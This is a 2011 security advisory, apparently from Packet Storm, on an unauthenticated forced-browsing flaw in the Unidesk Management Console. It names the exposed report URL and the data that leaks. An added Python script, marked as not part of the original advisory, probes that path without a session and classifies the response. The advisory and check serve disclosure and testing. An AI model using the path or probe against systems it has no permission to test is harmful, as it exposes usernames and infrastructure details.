Unidesk Management Administrative Bypass

2011-03-25T00:00:00
ID PACKETSTORM:99743
Type packetstorm
Reporter Nathan Power
Modified 2011-03-25T00:00:00

Description

------------------------------------------------------------------  
1. Summary:  
  
The Unidesk management appliance is prone to a forceful browsing (forced  
browsing) vulnerability that allows an unauthenticated attacker to reach  
resources intended only for administrators.  
  
------------------------------------------------------------------  
2. Description:  
  
The "ReportingService" web service does not check for valid session  
credentials before serving reports about the Virtual Desktop Infrastructure  
environment, so the reporting pages are reachable without logging in.  
  
These reports provide information such as:  
  
* Applications installed  
* CachePoint appliance information  
* Desktop names  
* Domain usernames  
* Operating systems installed  
  
An attacker may gain access to the reports by directly pointing to the  
following URL:  
  
/Uni.Web/Reporting/Default.aspx  
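The following is an added verification check, not part of the original advisory or the vendor's code. It sends a single unauthenticated GET to the path above without any session cookie, does not follow redirects, and decides from the status code, Location header and body whether the report page was served (exposed) or the request was bounced to a login page (protected). The login-page markers, report markers and the Login.aspx redirect in the constructed sample responses are assumptions for illustration, not taken from the product.

```python
"""Forced-browsing check for an unauthenticated report endpoint.

Added example (not from the advisory or the vendor). The only fact taken
from the advisory is REPORT_PATH; every marker and sample response below is
a constructed assumption.
"""
import http.client
from dataclasses import dataclass

REPORT_PATH = "/Uni.Web/Reporting/Default.aspx"  # path named in the advisory

# Assumed heuristics: tune these against a known-good response from the target.
LOGIN_MARKERS = ("login", "logon", "signin", "returnurl=")
REPORT_MARKERS = ("report", "cachepoint", "desktop")
REDIRECT_CODES = (301, 302, 303, 307, 308)


@dataclass
class Verdict:
    exposed: bool   # True when the page was served without authentication
    reason: str


def classify(status: int, headers: dict, body: str) -> Verdict:
    """Decide whether an anonymous GET reached the report page.

    A redirect to a login URL, a 401/403, or a 200 whose body looks like a
    login form all count as protected. Any other 200 counts as exposed.
    """
    hdrs = {k.lower(): v for k, v in headers.items()}
    location = hdrs.get("location", "").lower()
    text = body.lower()
    if status in REDIRECT_CODES:
        if any(m in location for m in LOGIN_MARKERS):
            return Verdict(False, f"redirected to login: {location}")
        return Verdict(False, f"redirected elsewhere: {location}")
    if status in (401, 403):
        return Verdict(False, f"access denied with HTTP {status}")
    if status == 200:
        looks_like_login = any(m in text for m in LOGIN_MARKERS)
        looks_like_report = any(m in text for m in REPORT_MARKERS)
        if looks_like_login and not looks_like_report:
            return Verdict(False, "HTTP 200 but body looks like a login form")
        if looks_like_report:
            return Verdict(True, "HTTP 200 with report content, no session sent")
        return Verdict(True, "HTTP 200 without authentication; inspect body")
    return Verdict(False, f"unexpected HTTP {status}")


def probe(host: str, port: int = 443, use_tls: bool = True,
          timeout: float = 10.0) -> Verdict:
    """Send one cookie-less GET and classify the raw (unfollowed) response."""
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    try:
        # Deliberately no Cookie header: we test what an anonymous client gets.
        conn.request("GET", REPORT_PATH,
                     headers={"Host": host, "User-Agent": "forced-browse-check"})
        resp = conn.getresponse()          # http.client never follows redirects
        body = resp.read(65536).decode("utf-8", errors="replace")
        return classify(resp.status, dict(resp.getheaders()), body)
    finally:
        conn.close()


# Constructed sample responses (assumed shapes, not captured from a real device).
SAMPLE_VULNERABLE = (
    200,
    {"Content-Type": "text/html"},
    "<html><head><title>Reporting - Desktop Inventory</title></head><body>"
    "<table><tr><th>Desktop</th><th>Domain User</th><th>CachePoint</th></tr>"
    "</table></body></html>",
)
SAMPLE_FIXED = (
    302,
    {"Location": "/Uni.Web/Login.aspx?ReturnUrl=%2fUni.Web%2fReporting%2fDefault.aspx"},
    "",
)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    else:
        for sample in (SAMPLE_VULNERABLE, SAMPLE_FIXED):
            print(classify(*sample))
```

Run it with a hostname to probe a live appliance, or with no arguments to see the two constructed samples classified. Because redirects are not followed, a fixed system shows up as a 302 to the login page rather than as whatever the login page itself returns.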
  
------------------------------------------------------------------  
3. Impact:  
  
An unauthenticated attacker can read the inventory data listed above  
(desktop names, domain usernames, installed applications and operating  
systems, CachePoint appliance details). This is sensitive information that  
supports follow-on attacks against the enumerated accounts and systems.  
  
------------------------------------------------------------------  
4. Affected Products:  
  
Unidesk Management Console version 1.3 and prior.  
  
------------------------------------------------------------------  
5. Solution:  
  
Upgrade to version 1.4, in which the vendor states the issue is addressed.  
  
------------------------------------------------------------------  
6. Time Table:  
  
3/17/2011 Reported Vulnerability to the Vendor  
3/25/2011 Vendor acknowledged the vulnerability; fix to be addressed in the  
1.4 release  
  
------------------------------------------------------------------  
7. Credits:  
  
Discovered by Nathan Power  
www.securitypentest.com  
  
------------------------------------------------------------------  